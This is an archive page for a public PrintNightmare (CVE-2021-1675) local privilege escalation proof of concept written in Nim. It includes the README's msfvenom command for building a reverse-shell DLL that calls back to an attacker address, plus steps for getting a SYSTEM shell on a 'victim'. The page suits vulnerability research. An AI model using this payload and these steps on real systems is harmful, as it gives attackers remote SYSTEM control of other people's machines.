Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-1675 PoC — Windows Print Spooler Remote Code Execution Vulnerability

Source
https://github.com/eversinc33/NimNightmare
Associated Vulnerability
Title:Windows Print Spooler Remote Code Execution Vulnerability (CVE-2021-1675)
Description:Windows Print Spooler Remote Code Execution Vulnerability
Description
CVE-2021-1675 LPE PoC in Nim (PrintNightmare Local Privilege Escalation)
Readme
# CVE-2021-1675 LPE PoC

not my exploit! just wanted to play around with the `winim` library in nim.

### Usage

Generate DLL payload with `msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.8.237 LPORT=4444 -f dll > msfvenom.dll`, then start the handler on your attacker.

On the victim run `.\nimnightmare.exe <ABSOLUTE_PATH_TO_DLL>` and get a shell as SYSTEM.

![](./img.png)
File Snapshot

 [4.0K]  /data/pocs/6d6b6ba627e3ca44bf5dd5b84e4cfdc0e8216e9d
├── [476K]  img.png
├── [  88]  make.ps1
├── [1.4K]  nimnightmare.nim
└── [ 393]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →